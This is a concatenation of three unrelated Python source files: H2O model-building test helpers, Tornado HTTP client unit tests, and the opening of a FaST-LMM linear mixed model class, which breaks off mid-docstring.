print('FAIL: result for grid %s is None, timeout during build? result: %s' % (grid_id, result))
error = True
elif result['__http_response']['status_code'] != requests.codes.ok:
error = True
print("FAIL: expected 200 OK from a good grid validation request, got: " + str(result['__http_response']['status_code']))
print("dev_msg: " + result['dev_msg'])
if error:
print('Input parameters: ')
pp.pprint(original_params)
print('Grid parameters: ')
pp.pprint(grid_params)
print('Returned result: ')
pp.pprint(result)
assert result['job']['error_count'] == 0, "FAIL: Non-zero error_count for model: " + grid_id
def validate_validation_messages(result, expected_error_fields):
'''
Check that we got the expected ERROR validation messages for a model build or validation check with bad parameters.
'''
assert 'error_count' in result, "FAIL: Failed to find error_count in bad-parameters model build result."
assert 0 < result['error_count'], "FAIL: 0 != error_count in bad-parameters model build validation result."
error_fields = []
for validation_message in result['messages']:
if validation_message['message_type'] == 'ERRR':
error_fields.append(validation_message['field_name'])
not_found = [item for item in expected_error_fields if item not in error_fields]
assert len(not_found) == 0, 'FAIL: Failed to find all expected ERROR validation messages. Missing: ' + repr(not_found) + ' from result: ' + repr(error_fields)
assert len(not_found) == 0, 'FAIL: Failed to find all expected ERROR validation messages. Missing: ' + repr(not_found) + ' from result: ' + repr(result['messages'])
def validate_model_exists(a_node, model_name):
'''
Validate that a given model key is found in the models list.
'''
models = a_node.models()['models']
models_dict = list_to_dict(models, 'model_id/name')
assert model_name in models_dict, "FAIL: Failed to find " + model_name + " in models list: " + repr(models_dict.keys())
return a_node.models(key=model_name)['models'][0]
def validate_frame_exists(a_node, frame_name, frames=None):
'''
Validate that a given frame key is found in the frames list.
'''
if frames is None:
result = a_node.frames()
frames = result['frames']
frames_dict = list_to_dict(frames, 'frame_id/name')
assert frame_name in frames_dict, "FAIL: Failed to find " + frame_name + " in frames list: " + repr(frames_dict.keys())
return frames_dict[frame_name]
def validate_job_exists(a_node, job_name, jobs=None):
'''
Validate that a given job key is found in the jobs list.
'''
if jobs is None:
result = a_node.jobs()
jobs = result['jobs']
jobs_dict = list_to_dict(jobs, 'key/name')
assert job_name in jobs_dict, "FAIL: Failed to find " + job_name + " in jobs list: " + repr(jobs_dict.keys())
return jobs_dict[job_name]
def validate_actual_parameters(input_parameters, actual_parameters, training_frame, validation_frame):
'''
Validate that the returned parameters list for a model build contains all the values we passed in as input.
'''
actuals_dict = list_to_dict(actual_parameters, 'name')
for k, expected in input_parameters.iteritems():
# TODO: skipping some stuff for now because they aren't serialized properly
if k is 'response_column':
continue
# TODO: skipping training frame becuase model building is now changing the training frame. Why?!
if k is 'training_frame':
continue
# Python says True; json says true
assert k in actuals_dict, "FAIL: Expected key " + k + " not found in actual parameters list."
actual = actuals_dict[k]['actual_value']
actual_type = actuals_dict[k]['type']
if actual_type == 'boolean':
expected = bool(expected)
actual = True if 'true' == actual else False # true -> True
elif actual_type == 'int':
expected = int(expected)
actual = int(actual)
elif actual_type == 'long':
expected = long(expected)
actual = long(actual)
elif actual_type == 'string':
# convert from Unicode
expected = str(expected)
actual = str(actual)
elif actual_type == 'string[]':
# convert from Unicode
# expected = [str(expected_val) for expected_val in expected]
actual = [str(actual_val) for actual_val in actual]
elif actual_type == 'double':
expected = float(expected)
actual = float(actual)
elif actual_type == 'float':
expected = float(expected)
actual = float(actual)
elif actual_type.startswith('Key<'):
# For keys we send just a String but receive an object
expected = expected
actual = actual['name']
# TODO: don't do exact comparison of floating point!
assert expected == actual, "FAIL: Parameter with name: " + k + " expected to have input value: " + str(expected) + ", instead has: " + str(actual) + " cast from: " + str(actuals_dict[k]['actual_value']) + " ( type of expected: " + str(type(expected)) + ", type of actual: " + str(type(actual)) + ")"
# TODO: training_frame, validation_frame
def validate_grid_parameters(grid_parameters, actual_parameters):
'''
Validate that the returned parameters list for a model build contains values we passed in as grid parameters.
'''
actuals_dict = list_to_dict(actual_parameters, 'name')
for k, grid_param_values in grid_parameters.iteritems():
# Python says True; json says true
assert k in actuals_dict, "FAIL: Expected key " + k + " not found in grid parameters list."
actual = actuals_dict[k]['actual_value']
actual_type = actuals_dict[k]['type']
if actual_type == 'boolean':
grid_param_values = [bool(x) for x in grid_param_values]
actual = True if 'true' == actual else False # true -> True
elif actual_type == 'int':
grid_param_values = [int(x) for x in grid_param_values]
actual = int(actual)
elif actual_type == 'long':
grid_param_values = [long(x) for x in grid_param_values]
actual = long(actual)
elif actual_type == 'string':
# convert from Unicode
grid_param_values = [str(x) for x in grid_param_values]
actual = str(actual)
elif actual_type == 'string[]':
# convert from Unicode
# grid_param_values = [str(grid_param_values_val) for grid_param_values_val in grid_param_values]
actual = [str(actual_val) for actual_val in actual]
elif actual_type == 'double':
grid_param_values = [float(x) for x in grid_param_values]
actual = float(actual)
elif actual_type == 'float':
grid_param_values = [float(x) for x in grid_param_values]
actual = float(actual)
elif actual_type.startswith('Key<'):
# For keys we send just a String but receive an object
grid_param_values = grid_param_values
actual = actual['name']
# TODO: don't do exact comparison of floating point!
# print("actual_type: " + actual_type)
# print("actual: " + repr(actual) + " (" + str(type(actual)) + ")")
# print("grid_param_values: " + repr(grid_param_values))
# TODO: 1-d arrays only for the moment; no grid over DL layers
if actual_type.endswith(']'):
actual = actual[0]
# NOTE: check for IN
assert actual in grid_param_values, "FAIL: Parameter with name: " + k + " expected to be a possible grid value: " + str(grid_param_values) + ", instead has: " + str(actual) + " cast from: " + str(actuals_dict[k]['actual_value']) + " ( type of expected: " + str(type(grid_param_values[0])) + ", type of actual: " + str(type(actual)) + ")"
# TODO: training_frame, validation_frame
def fetch_and_validate_grid_sort(a_node, key, sort_by, decreasing):
# key='kmeans_prostate_grid', sort_by='totss', decreasing=TRUE)
grid = a_node.grid(key=key, sort_by=sort_by, decreasing=decreasing)
training_metrics = grid['training_metrics']
# check sorting:
criteria = []
# Unfortunately, we use mixed case in the JSON and lower case in the back end. . .
for mm in training_metrics:
for k, v in mm.iteritems():
if k.lower() == sort_by:
criteria.append(v)
break
unsorted = list(criteria)
criteria.sort(reverse=decreasing)
# print("criteria sorted: " + repr(criteria))
# print("original: " + repr(unsorted))
assert unsorted == criteria, "FAIL: model metrics were not sorted correctly by criterion: " + key + ", " + sort_by + ", decreasing: " + decreasing
for i in range(len(grid['model_ids'])):
assert grid['model_ids'][i]['name'] == training_metrics[i]['model']['name'], "FAIL: model_ids not sorted in the same order as training_metrics for grid: " + key + ", index: " + str(i)
def validate_predictions(a_node, result, model_name, frame_key, expected_rows, predictions_frame=None):
'''
Validate a /Predictions result.
'''
assert result is not None, "FAIL: Got a null result for scoring: " + model_name + " on: " + frame_key
assert 'model_metrics' in result, "FAIL: Predictions for scoring: " + model_name + " on: " + frame_key + " does not contain a model_metrics object."
mm = result['model_metrics'][0]
h2o.H2O.verboseprint('mm: ', repr(mm))
#assert 'auc' in mm, "FAIL: Predictions for scoring: " + model_name + " on: " + frame_key + " does not contain an AUC."
#assert 'cm' in mm, "FAIL: Predictions for scoring: " + model_name + " on: " + frame_key + " does not contain a CM."
assert 'predictions' in mm, "FAIL: Predictions for scoring: " + model_name + " on: " + frame_key + " does not contain an predictions section."
assert 'frame_id' in mm['predictions'], "FAIL: Predictions for scoring: " + model_name + " on: " + frame_key + " does not contain a key."
assert 'name' in mm['predictions']['frame_id'], "FAIL: Predictions for scoring: " + model_name + " on: " + frame_key + " does not contain a key name."
predictions_key = mm['predictions']['frame_id']['name']
f = a_node.frames(key=predictions_key, find_compatible_models=True, row_count=5)
frames = f['frames']
frames_dict = list_to_dict(frames, 'frame_id/name')
assert predictions_key in frames_dict, "FAIL: Failed to find predictions key" + predictions_key + " in Frames list."
predictions = mm['predictions']
h2o.H2O.verboseprint('prediction result: ', repr(result))
assert 'columns' in predictions, "FAIL: Predictions for scoring: " + model_name + " on: " + frame_key + " does not contain an columns section."
assert len(predictions['columns']) > 0, "FAIL: Predictions for scoring: " + model_name + " on: " + frame_key + " does not contain any columns."
assert 'label' in predictions['columns'][0], "FAIL: Predictions for scoring: " + model_name + " on: " + frame_key + " column 0 has no label element."
assert 'predict' == predictions['columns'][0]['label'], "FAIL: Predictions for scoring: " + model_name + " on: " + frame_key + " column 0 is not 'predict'."
assert expected_rows == predictions['rows'], "FAIL: Predictions for scoring: " + model_name + " on: " + frame_key + " has an unexpected number of rows."
assert 'predictions_frame' in result, "FAIL: failed to find 'predictions_frame' in predict result:" + h2o_test_utils.dump_json(result)
assert 'name' in result['predictions_frame'], "FAIL: failed to find name in 'predictions_frame' in predict result:" + h2o_test_utils.dump_json(result)
if predictions_frame is not None:
assert predictions_frame == result['predictions_frame']['name'], "FAIL: bad value for 'predictions_frame' in predict result; expected: " + predictions_frame + ", got: " + result['predictions_frame']['name']
def cleanup(a_node, models=None, frames=None):
'''
DELETE the specified models and frames from H2O.
'''
###################
# test delete_model
if models is None:
a_node.delete_models()
else:
for model in models:
a_node.delete_model(model)
ms = a_node.models()
if models is None:
assert 'models' in ms and 0 == len(ms['models']), "FAIL: Called delete_models and the models list isn't empty: " + h2o_test_utils.dump_json(ms)
else:
for model in models:
for m in ms['models']:
assert m['model_id'] != model, 'FAIL: Found model that we tried to delete in the models list: ' + model
###################
# test delete_frame
if frames is not None:
for frame in frames:
a_node.delete_frame(frame)
ms = a_node.frames(row_count=5)
found = False
for m in ms['frames']:
assert m['frame_id'] != frame, 'FAIL: Found frame that we tried to delete in the frames list: ' + frame
# TODO
####################
# test delete_models
# jobs = a_node.build_model(algo='kmeans', model_id='dummy', training_frame='prostate_binomial', parameters={'k': 2 }, timeoutSecs=240) # synchronous
# a_node.delete_models()
# models = a_node.models()
# assert 'models' in models and 0 == len(models['models']), "FAIL: Called delete_models and the models list isn't empty: " + h2o_test_utils.dump_json(models)
# TODO
####################
# test delete_frames
class ModelSpec(dict):
'''
Dictionary which specifies all that's needed to build and validate a model.
'''
def __init__(self, dest_key, algo, frame_key, params, model_category):
self['algo'] = algo
self['frame_key'] = frame_key
self['params'] = params
self['model_category'] = model_category
if dest_key is None:
self['dest_key'] = algo + "_" + frame_key
else:
self['dest_key'] = dest_key
@staticmethod
def for_dataset(dest_key, algo, dataset, params):
'''
Factory for creating a ModelSpec for a given Dataset (frame and additional metadata).
'''
dataset_params = {}
assert 'model_category' in dataset, "FAIL: Failed to find model_category in dataset: " + repr(dataset)
if 'response_column' in dataset: dataset_params['response_column'] = dataset['response_column']
if 'ignored_columns' in dataset: dataset_params['ignored_columns'] = dataset['ignored_columns']
return ModelSpec(dest_key, algo, dataset['dest_key'], dict(dataset_params.items() + params.items()), dataset['model_category'])
def build_and_validate_model(self, a_node):
before = time.time()
if isVerbose(): print('About to build: ' + self['dest_key'] + ', a ' + self['algo'] + ' model on frame: ' + self['frame_key'] + ' with params: ' + repr(self['params']))
result = a_node.build_model(algo=self['algo'], model_id=self['dest_key'], training_frame=self['frame_key'], parameters=self['params'], timeoutSecs=240) # synchronous
validate_model_builder_result(result, self['params'], self['dest_key'])
model = validate_model_exists(a_node, self['dest_key'])
validate_actual_parameters(self['params'], model['parameters'], self['frame_key'], None)
# TODO: refactor into helper
assert 'output' in model, 'FAIL: Failed to find output object in model: ' + self['dest_key']
assert 'model_category' in model['output'], 'FAIL: Failed to find model_category in model: ' + self['dest_key']
assert model['output']['model_category'] == self['model_category'], 'FAIL: Expected model_category: ' + self['model_category'] + ' but got: ' + model['output']['model_category'] + ' for model: ' + self['dest_key']
if isVerbose(): print('Done building: ' + self['dest_key'] + " (" + str(time.time() - before) + ")")
return model
class GridSpec(dict):
'''
Dictionary which specifies all that's needed to build and validate a grid of models.
'''
def __init__(self, dest_key, algo, frame_key, params, grid_params, model_category, search_criteria=None):
self['algo'] = algo
self['frame_key'] = frame_key
self['params'] = params
self['grid_params'] = grid_params
self['model_category'] = model_category
self['search_criteria'] = search_criteria
if dest_key is None:
self['dest_key'] = algo + "_" + frame_key
else:
self['dest_key'] = dest_key
@staticmethod
def for_dataset(dest_key, algo, dataset, params, grid_params, search_criteria=None):
'''
Factory for creating a GridSpec for a given Dataset (frame and additional metadata).
'''
dataset_params = {}
assert 'model_category' in dataset, "FAIL: Failed to find model_category in dataset: " + repr(dataset)
if 'response_column' in dataset: dataset_params['response_column'] = dataset['response_column']
if 'ignored_columns' in dataset: dataset_params['ignored_columns'] = dataset['ignored_columns']
return GridSpec(dest_key, algo, dataset['dest_key'], dict(dataset_params.items() + params.items()), grid_params, dataset['model_category'], search_criteria)
def build_and_validate_grid(self, a_node):
before = time.time()
if isVerbose(): print('About to build: ' + self['dest_key'] + ', a ' + self['algo'] + ' model grid on frame: ' + self['frame_key'] + ' with params: ' + repr(self['params']) + ' and grid_params: ' + repr(self['grid_params']))
# returns a GridSearchSchema:
result = a_node.build_model_grid(algo=self['algo'], grid_id=self['dest_key'], training_frame=self['frame_key'], parameters=self['params'], grid_parameters=self['grid_params'], search_criteria=self['search_criteria'], timeoutSecs=240) # synchronous
if isVerboser(): print('result: ' + repr(result))
grid = a_node.grid(key=self['dest_key'])
if isVerboser(): print('grid: ' + repr(grid))
validate_grid_builder_result(grid, self['params'], self['grid_params'], self['dest_key'])
# print("grid result: " + repr(grid))
# print("grid __meta: " + repr(grid['__meta']))
for model_key_dict in grid['model_ids']:
model_key = model_key_dict['name']
model = validate_model_exists(a_node, model_key)
validate_actual_parameters(self['params'], model['parameters'], self['frame_key'], None)
validate_grid_parameters(self['grid_params'], model['parameters'])
assert 'output' in model, 'FAIL: Failed to find output object in model: ' + self['dest_key']
assert 'model_category' in model['output'], 'FAIL: Failed to find model_category in model: ' + self['dest_key']
assert model['output']['model_category'] == self['model_category'], 'FAIL: Expected model_category: ' + self['model_category'] + ' but got: ' + model['output']['model_category'] + ' for model: ' + self['dest_key']
# Cartesian or random with max_models: check that we got the right number of models if we know beforehand:
combos = 1
for k, vals in self['grid_params'].iteritems():
combos *= len(vals)
# NOTE: if we have a stopping critereon which is not a fixed number we don't know how many models to expect
expected = None
if self['search_criteria'] is None or self['search_criteria']['strategy'] is 'Cartesian':
expected = combos
elif self['search_criteria'] is not None and 'max_models' in self['search_criteria'] and 'max_time_ms' not in self['search_criteria']:
expected = min(combos, self['search_criteria']['max_models'])
if expected is not None:
assert expected == len(grid['model_ids']), 'FAIL: Expected ' + str(expected) + ' models; got: ' + str(len(grid['model_ids']))
if isVerbose(): print('Done building: ' + self['dest_key'] + " (" + str(time.time() - before) + ")")
return grid
### TODO: we should be able to have multiple DatasetSpecs that come from a single parse, for efficiency
class DatasetSpec(dict):
'''
Dictionary which specifies the properties of a Frame (Dataset) for a specific use
(e.g., prostate data with binomial classification on the CAPSULE column
OR prostate data with regression on the AGE column).
'''
def __init__(self, dest_key, path, expected_rows, model_category, response_column, ignored_columns):
self['path'] = os.path.realpath(path)
self['expected_rows'] = expected_rows
self['model_category'] = model_category
self['response_column'] = response_column
self['ignored_columns'] = ignored_columns
if dest_key == None:
# specify dest_key every time
basename = os.path.basename(path)
basename_split = basename.split(".")
if len(basename_split) == 1:
self['dest_key'] = basename_split[0] + ".hex" # name + ".hex"
else:
self['dest_key'] = basename_split[-2] + ".hex" # name without suffix + ".hex"
else:
self['dest_key'] = dest_key
def import_and_validate_dataset(self, a_node):
if isVerbose(): print("About to import and validate: " + self['path'])
import_result = a_node.import_files(path=self['path'])
if isVerboser():
print("import_result: ")
pp.pprint(import_result)
print("frames: ")
pp.pprint(a_node.frames(key=import_result['destination_frames'][0], row_count=5))
frames = a_node.frames(key=import_result['destination_frames'][0], row_count=5)['frames']
assert frames[0]['is_text'], "FAIL: Raw imported Frame is not is_text: " + repr(frames[0])
parse_result = a_node.parse(key=import_result['destination_frames'][0], dest_key=self['dest_key']) # TODO: handle multiple files
key = parse_result['frames'][0]['frame_id']['name']
assert key == self['dest_key'], 'FAIL: Imported frame key is wrong; expected: ' + self['dest_key'] + ', got: ' + key
assert self['expected_rows'] == parse_result['frames'][0]['rows'], 'FAIL: Imported frame number of rows is wrong; expected: ' + str(self['expected_rows']) + ', got: ' + str(parse_result['frames'][0]['rows'])
self['dataset'] = parse_result['frames'][0] # save the imported dataset object
if isVerbose(): print("Imported and validated key: " + self['dataset']['frame_id']['name'])
return self['dataset']
| |
import collections
import gzip
import logging
import socket
from tornado.ioloop import IOLoop
from tornado.simple_httpclient import SimpleAsyncHTTPClient, _DEFAULT_CA_CERTS
from tornado.test.httpclient_test import HTTPClientCommonTestCase, ChunkHandler, CountdownHandler, HelloWorldHandler
from tornado.testing import AsyncHTTPTestCase, LogTrapTestCase
from tornado.util import b
from tornado.web import RequestHandler, Application, asynchronous, url
class SimpleHTTPClientCommonTestCase(HTTPClientCommonTestCase):
def get_http_client(self):
client = SimpleAsyncHTTPClient(io_loop=self.io_loop,
force_instance=True)
self.assertTrue(isinstance(client, SimpleAsyncHTTPClient))
return client
# Remove the base class from our namespace so the unittest module doesn't
# try to run it again.
del HTTPClientCommonTestCase
class TriggerHandler(RequestHandler):
def initialize(self, queue, wake_callback):
self.queue = queue
self.wake_callback = wake_callback
@asynchronous
def get(self):
logging.info("queuing trigger")
self.queue.append(self.finish)
self.wake_callback()
class HangHandler(RequestHandler):
@asynchronous
def get(self):
pass
class ContentLengthHandler(RequestHandler):
def get(self):
self.set_header("Content-Length", self.get_argument("value"))
self.write("ok")
class HeadHandler(RequestHandler):
def head(self):
self.set_header("Content-Length", "7")
class NoContentHandler(RequestHandler):
def get(self):
if self.get_argument("error", None):
self.set_header("Content-Length", "7")
self.set_status(204)
class SeeOther303PostHandler(RequestHandler):
def post(self):
assert self.request.body == b("blah")
self.set_header("Location", "/303_get")
self.set_status(303)
class SeeOther303GetHandler(RequestHandler):
def get(self):
assert not self.request.body
self.write("ok")
class SimpleHTTPClientTestCase(AsyncHTTPTestCase, LogTrapTestCase):
def setUp(self):
super(SimpleHTTPClientTestCase, self).setUp()
self.http_client = SimpleAsyncHTTPClient(self.io_loop)
def get_app(self):
# callable objects to finish pending /trigger requests
self.triggers = collections.deque()
return Application([
url("/trigger", TriggerHandler, dict(queue=self.triggers,
wake_callback=self.stop)),
url("/chunk", ChunkHandler),
url("/countdown/([0-9]+)", CountdownHandler, name="countdown"),
url("/hang", HangHandler),
url("/hello", HelloWorldHandler),
url("/content_length", ContentLengthHandler),
url("/head", HeadHandler),
url("/no_content", NoContentHandler),
url("/303_post", SeeOther303PostHandler),
url("/303_get", SeeOther303GetHandler),
], gzip=True)
def test_singleton(self):
# Class "constructor" reuses objects on the same IOLoop
self.assertTrue(SimpleAsyncHTTPClient(self.io_loop) is
SimpleAsyncHTTPClient(self.io_loop))
# unless force_instance is used
self.assertTrue(SimpleAsyncHTTPClient(self.io_loop) is not
SimpleAsyncHTTPClient(self.io_loop,
force_instance=True))
# different IOLoops use different objects
io_loop2 = IOLoop()
self.assertTrue(SimpleAsyncHTTPClient(self.io_loop) is not
SimpleAsyncHTTPClient(io_loop2))
def test_connection_limit(self):
client = SimpleAsyncHTTPClient(self.io_loop, max_clients=2,
force_instance=True)
self.assertEqual(client.max_clients, 2)
seen = []
# Send 4 requests. Two can be sent immediately, while the others
# will be queued
for i in range(4):
client.fetch(self.get_url("/trigger"),
lambda response, i=i: (seen.append(i), self.stop()))
self.wait(condition=lambda: len(self.triggers) == 2)
self.assertEqual(len(client.queue), 2)
# Finish the first two requests and let the next two through
self.triggers.popleft()()
self.triggers.popleft()()
self.wait(condition=lambda: (len(self.triggers) == 2 and
len(seen) == 2))
self.assertEqual(set(seen), set([0, 1]))
self.assertEqual(len(client.queue), 0)
# Finish all the pending requests
self.triggers.popleft()()
self.triggers.popleft()()
self.wait(condition=lambda: len(seen) == 4)
self.assertEqual(set(seen), set([0, 1, 2, 3]))
self.assertEqual(len(self.triggers), 0)
def test_redirect_connection_limit(self):
# following redirects should not consume additional connections
client = SimpleAsyncHTTPClient(self.io_loop, max_clients=1,
force_instance=True)
client.fetch(self.get_url('/countdown/3'), self.stop,
max_redirects=3)
response = self.wait()
response.rethrow()
def test_default_certificates_exist(self):
open(_DEFAULT_CA_CERTS).close()
def test_gzip(self):
# All the tests in this file should be using gzip, but this test
# ensures that it is in fact getting compressed.
# Setting Accept-Encoding manually bypasses the client's
# decompression so we can see the raw data.
response = self.fetch("/chunk", use_gzip=False,
headers={"Accept-Encoding": "gzip"})
self.assertEqual(response.headers["Content-Encoding"], "gzip")
self.assertNotEqual(response.body, b("asdfqwer"))
# Our test data gets bigger when gzipped. Oops. :)
self.assertEqual(len(response.body), 34)
f = gzip.GzipFile(mode="r", fileobj=response.buffer)
self.assertEqual(f.read(), b("asdfqwer"))
def test_max_redirects(self):
response = self.fetch("/countdown/5", max_redirects=3)
self.assertEqual(302, response.code)
# We requested 5, followed three redirects for 4, 3, 2, then the last
# unfollowed redirect is to 1.
self.assertTrue(response.request.url.endswith("/countdown/5"))
self.assertTrue(response.effective_url.endswith("/countdown/2"))
self.assertTrue(response.headers["Location"].endswith("/countdown/1"))
def test_303_redirect(self):
response = self.fetch("/303_post", method="POST", body="blah")
self.assertEqual(200, response.code)
self.assertTrue(response.request.url.endswith("/303_post"))
self.assertTrue(response.effective_url.endswith("/303_get"))
#request is the original request, is a POST still
self.assertEqual("POST", response.request.method)
def test_request_timeout(self):
response = self.fetch('/hang', request_timeout=0.1)
self.assertEqual(response.code, 599)
self.assertTrue(0.099 < response.request_time < 0.11, response.request_time)
self.assertEqual(str(response.error), "HTTP 599: Timeout")
def test_ipv6(self):
if not socket.has_ipv6:
# python compiled without ipv6 support, so skip this test
return
try:
self.http_server.listen(self.get_http_port(), address='::1')
except socket.gaierror as e:
if e.args[0] == socket.EAI_ADDRFAMILY:
# python supports ipv6, but it's not configured on the network
# interface, so skip this test.
return
raise
url = self.get_url("/hello").replace("localhost", "[::1]")
# ipv6 is currently disabled by default and must be explicitly requested
self.http_client.fetch(url, self.stop)
response = self.wait()
self.assertEqual(response.code, 599)
self.http_client.fetch(url, self.stop, allow_ipv6=True)
response = self.wait()
self.assertEqual(response.body, b("Hello world!"))
def test_multiple_content_length_accepted(self):
response = self.fetch("/content_length?value=2,2")
self.assertEqual(response.body, b("ok"))
response = self.fetch("/content_length?value=2,%202,2")
self.assertEqual(response.body, b("ok"))
response = self.fetch("/content_length?value=2,4")
self.assertEqual(response.code, 599)
response = self.fetch("/content_length?value=2,%202,3")
self.assertEqual(response.code, 599)
def test_head_request(self):
response = self.fetch("/head", method="HEAD")
self.assertEqual(response.code, 200)
self.assertEqual(response.headers["content-length"], "7")
self.assertFalse(response.body)
def test_no_content(self):
response = self.fetch("/no_content")
self.assertEqual(response.code, 204)
# 204 status doesn't need a content-length, but tornado will
# add a zero content-length anyway.
self.assertEqual(response.headers["Content-length"], "0")
# 204 status with non-zero content length is malformed
response = self.fetch("/no_content?error=1")
self.assertEqual(response.code, 599)
| |
import scipy as SP
import numpy as NP
import scipy.linalg as LA
import scipy.optimize as opt
import scipy.stats as ST
import scipy.special as SS
from fastlmm.util.mingrid import *
from fastlmm.util.util import *
import time
import warnings
import logging
class LMM(object):
"""
linear mixed model with up to two kernels
N(y | X*beta ; sigma2(h2*((1-a2)*K0 + a2*K1) + (1-h2)*I),
where
K0 = G0*G0^T
K1 = G1*G1^T
"""
__slots__ = ["G","G0","G1","y","X","K0","K1","K","U","S","UX","Uy","UUX","UW","UUW","UUy","pos0","pos1","a2","exclude_idx",
"forcefullrank","numcalls","Xstar","Kstar","Kstar_star","UKstar","UUKstar","Gstar","K0star","K1star","K0star_star","K1star_star"]
def __init__(self,forcefullrank=False):
'''
Input:
forcefullrank : if True, then the code always computes K and runs cubically
(False)
'''
self.X=None
self.y=None
self.G=None
self.G0=None
self.G1=None
self.K=None
self.K0=None
self.K1=None
self.U=None
self.S=None
self.Uy=None
self.UUy=None
self.UX=None
self.UUX=None
self.UW=None
self.UUW=None
self.pos0=None
self.pos1=None
self.a2=None
self.exclude_idx=[]
self.forcefullrank=forcefullrank
self.numcalls=0
self.Xstar=None
self.Kstar=None
self.Kstar_star = None
self.UKstar=None
self.UUKstar=None
self.Gstar = None
def setX(self, X):
'''
set the fixed effects X (covariates).
The Kernel has to be set in advance by first calling setG() or setK().
--------------------------------------------------------------------------
Input:
X : [N*D] 2-dimensional array of covariates
--------------------------------------------------------------------------
'''
self.X = X
self.UX = self.U.T.dot(X)
k=self.S.shape[0]
N=self.X.shape[0]
if (k<N):
self.UUX = X - self.U.dot(self.UX)
def setX2(self, X):
'''
a version of setX that doesn't assume that Eigenvalue decomposition has been done.
'''
self.X = X
N=self.X.shape[0]
def sety(self, y):
'''
set the phenotype y.
The Kernel has to be set in advance by first calling setG() or setK().
--------------------------------------------------------------------------
Input:
y : [N] 1-dimensional array of phenotype values
--------------------------------------------------------------------------
'''
assert y.ndim==1, "y should be 1-dimensional"
self.y = y
self.Uy = self.U.T.dot(y)
k=self.S.shape[0]
N=self.y.shape[0]
if (k<N):
self.UUy = y - self.U.dot(self.Uy)
def sety2(self, y):
'''
a version of sety that doesn't assume that Eigenvalue decomposition has been done.
'''
assert y.ndim==1, "y should be 1-dimensional"
self.y = y
N=self.y.shape[0]
def setG(self, G0=None, G1=None, a2=0.0, K0=None,K1=None):
'''
set the Kernel (1-a2)*K0 and a2*K1 from G0 and G1.
This has to be done before setting the data setX() and setY().
If k0+k1>>N and similar kernels are used repeatedly, it is beneficial to precompute
the kernel and pass it as an argument.
----------------------------------------------------------------------------
Input:
G0 : [N*k0] array of random effects
G1 : [N*k1] array of random effects (optional)
a2 : mixture weight between K0=G0*G0^T and K1=G1*G1^T
K0 : [N*N] array, random effects covariance (positive semi-definite)
K1 : [N*N] array, random effects covariance (positive semi-definite)(optional)
-----------------------------------------------------------------------------
'''
self.G0 = G0
self.G1 = G1
if a2 <0.0:
a2=0.0
if a2>1.0:
a2=1.0
if G1 is None and G0 is not None:
self.G=G0
elif G0 is not None and G1 is not None:
#build the weighted concatenation of G0 and G1 = varianceComponent
if a2 == 0.0:
logging.info("a2=0.0, only using G0")
self.G = G0
elif a2 == 1.0:
self.G = G1
logging.info("a2=1.0, only using G1")
else:
self.G = SP.concatenate((SP.sqrt(1.0-a2) * G0, SP.sqrt(a2) * G1),1)
else:
self.G=None
if self.G is not None:
N = self.G.shape[0]
k = self.G.shape[1]
else:
N = K0.shape[0]
k=N
if k>0:
if ((not self.forcefullrank) and (k<N)):
#it is faster using the eigen decomposition of G.T*G but this is more accurate
try:
[U,S,V] = LA.svd(self.G,full_matrices = False)
if np.any(S < -0.1):
logging.warning("kernel contains a negative Eigenvalue")
self.U = U
self.S = S*S
except LA.LinAlgError: # revert to Eigenvalue decomposition
logging.warning("Got SVD exception, trying eigenvalue decomposition of square of G. Note that this is a little bit less accurate")
[S_,V_] = LA.eigh(self.G.T.dot(self.G))
if np.any(S_ < -0.1):
logging.warning("kernel contains a negative Eigenvalue")
S_nonz=(S_>0)
self.S = S_[S_nonz]
self.S*=(N/self.S.sum())
self.U=self.G.dot(V_[:,S_nonz]/SP.sqrt(self.S))
else:
if K0 is None:
K0=self.G0.dot(self.G0.T);
self.K0=K0
if (self.G1 is not None) and (K1 is None):
K1=self.G1.dot(self.G1.T);
self.setK(K0=K0, K1=K1, a2=a2)
#K=self.G.dot(self.G.T)
#self.setK(K)
self.a2 = a2
pass
else:#rank of kernel = 0 (linear regression case)
self.S = SP.zeros((0))
self.U = SP.zeros_like(self.G)
def setK(self, K0, K1=None, a2=0.0):
'''
set the Kernel (1-a2)*K0 and a2*K1.
This has to be done before setting the data setX() and setY().
--------------------------------------------------------------------------
Input:
K0 : [N*N] array, random effects covariance (positive semi-definite)
K1 : [N*N] array, random effects covariance (positive semi-definite)(optional)
a2 : mixture weight between K0 and K1
--------------------------------------------------------------------------
'''
self.K0 = K0
self.K1 = K1
logging.debug("About to mix K0 and K1")
if K1 is None:
self.K = K0
else:
self.K = (1.0-a2) * K0 + a2 * K1
logging.debug("About to eigh")
[S,U] = LA.eigh(self.K)
logging.debug("Done with to eigh")
if np.any(S < -0.1):
logging.warning("kernel contains a negative Eigenvalue")
self.U=U
self.S=S#*(S.shape[0]/S.sum())
self.a2 = a2
def setK2(self, K0, K1=None, a2=0.0):
'''
a version of setK that doesn't do Eigenvalue decomposition.
'''
self.K0 = K0
self.K1 = K1
logging.debug("About to mix K0 and K1")
if K1 is None:
self.K = K0
else:
self.K = (1.0-a2) * K0 + a2 * K1
self.a2 = a2
def set_exclude_idx(self, idx):
'''
--------------------------------------------------------------------------
Input:
idx : [k_up: number of SNPs to be removed] holds the indices of SNPs to be removed
--------------------------------------------------------------------------
'''
self.exclude_idx = idx
def innerLoopTwoKernel(self, a2 = 0.5, nGridH2=10, minH2=0.0, maxH2=0.99999, **kwargs):
'''
For a given weight a2, finds the optimal h2 and returns the negative log-likelihood
--------------------------------------------------------------------------
Input:
a2 : mixture weight between K0 and K1
nGridH2 : number of h2-grid points to evaluate the negative log-likelihood at
minH2 : minimum value for h2 optimization
maxH2 : maximum value for h2 optimization
--------------------------------------------------------------------------
Output:
dictionary containing the model parameters at the optimal h2
--------------------------------------------------------------------------
'''
if self.K0 is not None:
self.setK(K0 = self.K0, K1 = self.K1, a2 = a2)
else:
self.setG(G0 = self.G0, G1 = self.G1, a2 = a2)
self.setX(self.X)
self.sety(self.y)
return self.findH2(nGridH2=nGridH2, minH2=minH2, maxH2=maxH2, **kwargs)
def findA2(self, nGridA2=10, minA2=0.0, maxA2=1.0, nGridH2=10, minH2=0.0, maxH2=0.99999,verbose=False, **kwargs):
'''
Find the optimal a2 and h2, such that K=(1.0-a2)*K0+a2*K1. Performs a double loop optimization (could be expensive for large grid-sizes)
(default maxA2 value is set to 1 as loss of positive definiteness of the final model covariance only depends on h2, not a2)
--------------------------------------------------------------------------
Input:
nGridA2 : number of a2-grid points to evaluate the negative log-likelihood at
minA2 : minimum value for a2 optimization
maxA2 : maximum value for a2 optimization
